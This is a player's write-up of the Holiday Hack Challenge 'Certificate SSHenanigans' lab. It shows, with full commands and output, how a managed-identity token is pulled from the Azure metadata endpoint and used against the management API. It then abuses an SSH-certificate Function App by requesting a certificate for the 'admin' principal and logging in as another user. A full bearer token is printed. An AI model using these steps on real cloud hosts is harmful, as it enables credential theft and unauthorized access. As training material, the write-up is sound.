🐚Certificate SSHenanigans

Location - Pixel Island: Rainraster Cliffs

Objective

Conversation with Alabaster Snow

Hello there! Alabaster Snowball at your service.

I could use your help with my fancy new Azure server at ssh-server-vm.santaworkshopgeeseislands.org.

ChatNPT suggested I upgrade the host to use SSH certificates, such a great idea!

It even generated ready-to-deploy code for an Azure Function App so elves can request their own certificates. What a timesaver!

I'm a little wary though. I'd appreciate it if you could take a peek and confirm everything's secure before I deploy this configuration to all the Geese Islands servers.

Generate yourself a certificate and use the monitor account to access the host. See if you can grab my TODO list.

If you haven't heard of SSH certificates, Thomas Bouve gave an introductory talk and demo on that topic recently.

Oh, and if you need to peek at the Function App code, there's a handy Azure REST API endpoint which will give you details about how the Function App is deployed.

Solution

First, we look at what the Azure web app provides us with. It looks like it generates an ssh certificate for specific principals.

We can save this cert as id_rsa-cert.pub to authenticate to the server as user "Monitor"

We can close out of the running SatTracker by using ctrl + c

From here, we know that we can leverage the Azure REST API in order to enumerate the system & try to gain access to the source code for the app.

First we get information from the initial API endpoint. This gives us info about the Resource group, subsciption ID, and more.

Endpoint 1 command & output

monitor@ssh-server-vm:~$ curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | jq
{
  "compute": {
    "azEnvironment": "AzurePublicCloud",
    "customData": "",
    "evictionPolicy": "",
    "isHostCompatibilityLayerVm": "false",
    "licenseType": "",
    "location": "eastus",
    "name": "ssh-server-vm",
    "offer": "",
    "osProfile": {
      "adminUsername": "",
      "computerName": "",
      "disablePasswordAuthentication": ""
    },
    "osType": "Linux",
    "placementGroupId": "",
    "plan": {
      "name": "",
      "product": "",
      "publisher": ""
    },
    "platformFaultDomain": "0",
    "platformUpdateDomain": "0",
    "priority": "",
    "provider": "Microsoft.Compute",
    "publicKeys": [],
    "publisher": "",
    "resourceGroupName": "northpole-rg1",
    "resourceId": "/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.Compute/virtualMachines/ssh-server-vm",
    "securityProfile": {
      "secureBootEnabled": "false",
      "virtualTpmEnabled": "false"
    },
    "sku": "",
    "storageProfile": {
      "dataDisks": [],
      "imageReference": {
        "id": "",
        "offer": "",
        "publisher": "",
        "sku": "",
        "version": ""
      },
      "osDisk": {
        "caching": "ReadWrite",
        "createOption": "Attach",
        "diffDiskSettings": {
          "option": ""
        },
        "diskSizeGB": "30",
        "encryptionSettings": {
          "enabled": "false"
        },
        "image": {
          "uri": ""
        },
        "managedDisk": {
          "id": "/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.Compute/disks/ssh-server-vm_os_disk",
          "storageAccountType": "Standard_LRS"
        },
        "name": "ssh-server-vm_os_disk",
        "osType": "Linux",
        "vhd": {
          "uri": ""
        },
        "writeAcceleratorEnabled": "false"
      },
      "resourceDisk": {
        "size": "63488"
      }
    },
    "subscriptionId": "2b0942f3-9bca-484b-a508-abdae2db5e64",
    "tags": "Project:HHC23",
    "tagsList": [
      {
        "name": "Project",
        "value": "HHC23"
      }
    ],
    "userData": "",
    "version": "",
    "vmId": "1f943876-80c5-4fc2-9a77-9011b0096c78",
    "vmScaleSetName": "",
    "vmSize": "Standard_B4ms",
    "zone": ""
  },
  "network": {
    "interface": [
      {
        "ipv4": {
          "ipAddress": [
            {
              "privateIpAddress": "10.0.0.50",
              "publicIpAddress": ""
            }
          ],
          "subnet": [
            {
              "address": "10.0.0.0",
              "prefix": "24"
            }
          ]
        },
        "ipv6": {
          "ipAddress": []
        },
        "macAddress": "6045BDFE2D67"
      }
    ]
  }
}

Next, we get an Aurhtoization token from the oauth endpoint.

Endpoint 2 command & output

monitor@ssh-server-vm:~$ curl curl 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https%3A%2F%2Fmanagement.azure.com%2F' -H Metadata:true -s
{"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSIsImtpZCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSJ9.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tLyIsImlzcyI6Imh0dHBzOi8vc3RzLndpbmRvd3MubmV0LzkwYTM4ZWRhLTQwMDYtNGRkNS05MjRjLTZjYTU1Y2FjYzE0ZC8iLCJpYXQiOjE3MDQyNTQ1NTQsIm5iZiI6MTcwNDI1NDU1NCwiZXhwIjoxNzA0MzQxMjU0LCJhaW8iOiJFMlZnWUxoZm5lOHNJUHAxSWRPbVdURTZwb2NyQUE9PSIsImFwcGlkIjoiYjg0ZTA2ZDMtYWJhMS00YmNjLTk2MjYtMmUwZDc2Y2JhMmNlIiwiYXBwaWRhY3IiOiIyIiwiaWRwIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvOTBhMzhlZGEtNDAwNi00ZGQ1LTkyNGMtNmNhNTVjYWNjMTRkLyIsImlkdHlwIjoiYXBwIiwib2lkIjoiNjAwYTNiYzgtN2UyYy00NGU1LThhMjctMThjM2ViOTYzMDYwIiwicmgiOiIwLkFGRUEybzZqa0FaQTFVMlNUR3lsWEt6QlRVWklmM2tBdXRkUHVrUGF3ZmoyTUJQUUFBQS4iLCJzdWIiOiI2MDBhM2JjOC03ZTJjLTQ0ZTUtOGEyNy0xOGMzZWI5NjMwNjAiLCJ0aWQiOiI5MGEzOGVkYS00MDA2LTRkZDUtOTI0Yy02Y2E1NWNhY2MxNGQiLCJ1dGkiOiI3dnNWSGdIRURVZVZudDRja2YybUJnIiwidmVyIjoiMS4wIiwieG1zX2F6X3JpZCI6Ii9zdWJzY3JpcHRpb25zLzJiMDk0MmYzLTliY2EtNDg0Yi1hNTA4LWFiZGFlMmRiNWU2NC9yZXNvdXJjZWdyb3Vwcy9ub3J0aHBvbGUtcmcxL3Byb3ZpZGVycy9NaWNyb3NvZnQuQ29tcHV0ZS92aXJ0dWFsTWFjaGluZXMvc3NoLXNlcnZlci12bSIsInhtc19jYWUiOiIxIiwieG1zX21pcmlkIjoiL3N1YnNjcmlwdGlvbnMvMmIwOTQyZjMtOWJjYS00ODRiLWE1MDgtYWJkYWUyZGI1ZTY0L3Jlc291cmNlZ3JvdXBzL25vcnRocG9sZS1yZzEvcHJvdmlkZXJzL01pY3Jvc29mdC5NYW5hZ2VkSWRlbnRpdHkvdXNlckFzc2lnbmVkSWRlbnRpdGllcy9ub3J0aHBvbGUtc3NoLXNlcnZlci1pZGVudGl0eSIsInhtc190Y2R0IjoxNjk4NDE3NTU3fQ.zFksRV5m6St57zmMuLWaW_u-LFhK7aTQeXfOzhTuAv-kvSKoe6zlh1fYTsMNNShn_6XA_4pVfHN-5eLrqvbua3kfsdSTzqwkb11I3dDDpnST1jk74OOzAiN9SHmlrd0f7ahVbkNl45cf8it6sQQ6mM0PF-8DQTbhTPmWcIx9CUzdc7fcbx8mP_I7U04z6Y6zalHqk07J-zieKz-5KmVDrDvGIL0ZlUcSFd-tweo4bs6WD5sHiQxyceB_EoYazuKSn2Vhp5qamfXKNAe9aXbx6W_B8rUAZ8XXn2Z-w-ERSHa3viwpVYI1KiELxLu6uYg90DgVg8mwWpB3TkZDsDqflw","client_id":"b84e06d3-aba1-4bcc-9626-2e0d76cba2ce","expires_in":"86285","expires_on":"1704341254","ext_expires_in":"86399","not_before":"1704254554","resource":"https://management.azure.com/","token_type":"Bearer"}

Endpoint 3 command & output

monitor@ssh-server-vm:~$ curl -X GET https://management.azure.com/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.Web/sites/northpole-ssh-certs-fa/sourcecontrols/web?api-version=2022-03-01 -H "Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSIsImtpZCI6IjVCM25SeHRRN2ppOGVORGMzRnkwNUtmOTdaRSJ9.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tLyIsImlzcyI6Imh0dHBzOi8vc3RzLndpbmRvd3MubmV0LzkwYTM4ZWRhLTQwMDYtNGRkNS05MjRjLTZjYTU1Y2FjYzE0ZC8iLCJpYXQiOjE3MDQyNTQ1NTQsIm5iZiI6MTcwNDI1NDU1NCwiZXhwIjoxNzA0MzQxMjU0LCJhaW8iOiJFMlZnWUxoZm5lOHNJUHAxSWRPbVdURTZwb2NyQUE9PSIsImFwcGlkIjoiYjg0ZTA2ZDMtYWJhMS00YmNjLTk2MjYtMmUwZDc2Y2JhMmNlIiwiYXBwaWRhY3IiOiIyIiwiaWRwIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvOTBhMzhlZGEtNDAwNi00ZGQ1LTkyNGMtNmNhNTVjYWNjMTRkLyIsImlkdHlwIjoiYXBwIiwib2lkIjoiNjAwYTNiYzgtN2UyYy00NGU1LThhMjctMThjM2ViOTYzMDYwIiwicmgiOiIwLkFGRUEybzZqa0FaQTFVMlNUR3lsWEt6QlRVWklmM2tBdXRkUHVrUGF3ZmoyTUJQUUFBQS4iLCJzdWIiOiI2MDBhM2JjOC03ZTJjLTQ0ZTUtOGEyNy0xOGMzZWI5NjMwNjAiLCJ0aWQiOiI5MGEzOGVkYS00MDA2LTRkZDUtOTI0Yy02Y2E1NWNhY2MxNGQiLCJ1dGkiOiI3dnNWSGdIRURVZVZudDRja2YybUJnIiwidmVyIjoiMS4wIiwieG1zX2F6X3JpZCI6Ii9zdWJzY3JpcHRpb25zLzJiMDk0MmYzLTliY2EtNDg0Yi1hNTA4LWFiZGFlMmRiNWU2NC9yZXNvdXJjZWdyb3Vwcy9ub3J0aHBvbGUtcmcxL3Byb3ZpZGVycy9NaWNyb3NvZnQuQ29tcHV0ZS92aXJ0dWFsTWFjaGluZXMvc3NoLXNlcnZlci12bSIsInhtc19jYWUiOiIxIiwieG1zX21pcmlkIjoiL3N1YnNjcmlwdGlvbnMvMmIwOTQyZjMtOWJjYS00ODRiLWE1MDgtYWJkYWUyZGI1ZTY0L3Jlc291cmNlZ3JvdXBzL25vcnRocG9sZS1yZzEvcHJvdmlkZXJzL01pY3Jvc29mdC5NYW5hZ2VkSWRlbnRpdHkvdXNlckFzc2lnbmVkSWRlbnRpdGllcy9ub3J0aHBvbGUtc3NoLXNlcnZlci1pZGVudGl0eSIsInhtc190Y2R0IjoxNjk4NDE3NTU3fQ.zFksRV5m6St57zmMuLWaW_u-LFhK7aTQeXfOzhTuAv-kvSKoe6zlh1fYTsMNNShn_6XA_4pVfHN-5eLrqvbua3kfsdSTzqwkb11I3dDDpnST1jk74OOzAiN9SHmlrd0f7ahVbkNl45cf8it6sQQ6mM0PF-8DQTbhTPmWcIx9CUzdc7fcbx8mP_I7U04z6Y6zalHqk07J-zieKz-5KmVDrDvGIL0ZlUcSFd-tweo4bs6WD5sHiQxyceB_EoYazuKSn2Vhp5qamfXKNAe9aXbx6W_B8rUAZ8XXn2Z-w-ERSHa3viwpVYI1KiELxLu6uYg90DgVg8mwWpB3TkZDsDqflw"
{"id":"/subscriptions/2b0942f3-9bca-484b-a508-abdae2db5e64/resourceGroups/northpole-rg1/providers/Microsoft.Web/sites/northpole-ssh-certs-fa/sourcecontrols/web","name":"northpole-ssh-certs-fa","type":"Microsoft.Web/sites/sourcecontrols","location":"East US","tags":{"project":"northpole-ssh-certs","create-cert-func-url-path":"/api/create-cert?code=candy-cane-twirl"},"properties":{"repoUrl":"https://github.com/SantaWorkshopGeeseIslandsDevOps/northpole-ssh-certs-fa","branch":"main","isManualIntegration":false,"isGitHubAction":true,"deploymentRollbackEnabled":false,"isMercurial":false,"provisioningState":"Succeeded","gitHubActionConfiguration":{"codeConfiguration":null,"containerConfiguration":null,"isLinux":true,"generateWorkflowFile":true,"workflowSettings":{"appType":"functionapp","publishType":"code","os":"linux","variables":{"runtimeVersion":"3.11"},"runtimeStack":"python","workflowApiVersion":"2020-12-01","useCanaryFusionServer":false,"authType":"publishprofile"}}}}

In this endpoint, we find a GitHub repository with the source code: https://github.com/SantaWorkshopGeeseIslandsDevOps/northpole-ssh-certs-fa

When we look at the source code, we see that the application actually allows us to set a value for the "principal".

In this situation, we can seemingly request ssh certificates for other users or "principals". So, we try for a default principal "admin" and when we send the request, we get an ssh cert back:

Principal Input, SSH Connection, To-Do List

┌──(stitch㉿snore)-[~]
└─$ curl -X POST https://northpole-ssh-certs-fa.azurewebsites.net/api/create-cert?code=candy-cane-twirl -H "Content-Type: application/json" --data '{"ssh_pub_key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMdIA9qVovsAm23Tfn1+DbYTUvnRgYHAgFt2PRqHWlCt01KS0i5P3RuHLIKKVYOyR3X+HxuOZOHgU/Iy3LggxPImIKh+5AaE0WHGll5krsT0FFjvWKv4k+cua3Hy/RUW8QSQCk6/iyRiNXGH2deKuDNn+koIBqBLVelXa7G7zsEbx2vm0ud4hAhnqQDM5BcwCgGGqUGyrtgVXh1ogjAKfZR5q9l59Zk2yNJ2tRDSp4ffdAbw1xO1fMbD1YZ6VGvbu6uUf8JL+939cnwGTL8LgMXCZ7c2a50M3G9Ctcu8zs0RiJ/zJ2/UOwzJLOmGYJuDjXQLHiuG+PV8GTXATNe0QS1xkZKdEfqXhgSlmwpvZ+wCP4OHDtkAStO61GRdAXwieMsklFk7QS5iQWAGTCVfgun0aqt+TaHBcYbc+40xOrMe7fcCm0jEVXSQBq/Q11DdhKP2PMZviTYo6eVn08GOQSf2Ne53X8TPTQxxZrbqOLHEWZX+YUecKXxGs41c+bc6k=","principal":"admin"}'
{"ssh_cert": "[email protected] AAAAIXJzYS1zaGEyLTUxMi1jZXJ0LXYwMUBvcGVuc3NoLmNvbQAAACcxMDE2NzYwMTU0MDAzNjQ5NDYyNzI2MTc5MjUzMDUxNzUyNDk0MDEAAAADAQABAAABgQDMdIA9qVovsAm23Tfn1+DbYTUvnRgYHAgFt2PRqHWlCt01KS0i5P3RuHLIKKVYOyR3X+HxuOZOHgU/Iy3LggxPImIKh+5AaE0WHGll5krsT0FFjvWKv4k+cua3Hy/RUW8QSQCk6/iyRiNXGH2deKuDNn+koIBqBLVelXa7G7zsEbx2vm0ud4hAhnqQDM5BcwCgGGqUGyrtgVXh1ogjAKfZR5q9l59Zk2yNJ2tRDSp4ffdAbw1xO1fMbD1YZ6VGvbu6uUf8JL+939cnwGTL8LgMXCZ7c2a50M3G9Ctcu8zs0RiJ/zJ2/UOwzJLOmGYJuDjXQLHiuG+PV8GTXATNe0QS1xkZKdEfqXhgSlmwpvZ+wCP4OHDtkAStO61GRdAXwieMsklFk7QS5iQWAGTCVfgun0aqt+TaHBcYbc+40xOrMe7fcCm0jEVXSQBq/Q11DdhKP2PMZviTYo6eVn08GOQSf2Ne53X8TPTQxxZrbqOLHEWZX+YUecKXxGs41c+bc6kAAAAAAAAAAQAAAAEAAAAkYWYxZGMyNDYtNzkxYi00MmFjLWI4NTEtNTEwMWFhNmE0NzQ4AAAACQAAAAVhZG1pbgAAAABllOsRAAAAAGW51j0AAAAAAAAAEgAAAApwZXJtaXQtcHR5AAAAAAAAAAAAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIGk2GNMCmJkXPJHHRQH9+TM4CRrsq/7BL0wp+P6rCIWHAAAAUwAAAAtzc2gtZWQyNTUxOQAAAEDk5JVahtJOoNzzRLDysk1eqaRLz47hhAzDBiIzoNfa2Ynil6aXu/d8c2B0dA/KgmqvXQVvlNIAr5Sdadjkw5kE ", "principal": "admin"}                                                                                                                                                                       
┌──(stitch㉿snore)-[~]
└─$ cp id_rsa-cert.pub .ssh                                  
                                                                                                                                                                       
┌──(stitch㉿snore)-[~]
└─$ ssh [email protected]
alabaster@ssh-server-vm:~$ ls
alabaster_todo.md  impacket
alabaster@ssh-server-vm:~$ cat alabaster_todo.md 
# Geese Islands IT & Security Todo List

- [X] Sleigh GPS Upgrade: Integrate the new "Island Hopper" module into Santa's sleigh GPS. Ensure Rudolph's red nose doesn't interfere with the signal.
- [X] Reindeer Wi-Fi Antlers: Test out the new Wi-Fi boosting antler extensions on Dasher and Dancer. Perfect for those beach-side internet browsing sessions.
- [ ] Palm Tree Server Cooling: Make use of the island's natural shade. Relocate servers under palm trees for optimal cooling. Remember to watch out for falling coconuts!
- [ ] Eggnog Firewall: Upgrade the North Pole's firewall to the new EggnogOS version. Ensure it blocks any Grinch-related cyber threats effectively.
- [ ] Gingerbread Cookie Cache: Implement a gingerbread cookie caching mechanism to speed up data retrieval times. Don't let Santa eat the cache!
- [ ] Toy Workshop VPN: Establish a secure VPN tunnel back to the main toy workshop so the elves can securely access to the toy blueprints.
- [ ] Festive 2FA: Roll out the new two-factor authentication system where the second factor is singing a Christmas carol. Jingle Bells is said to be the most secure.

We found out during this that the application written by chatNPT was not secure, as it allowed us to request SSH certificates as other users on the machine.

PreviousElf Hunt NextActive Directory

Last updated 1 year ago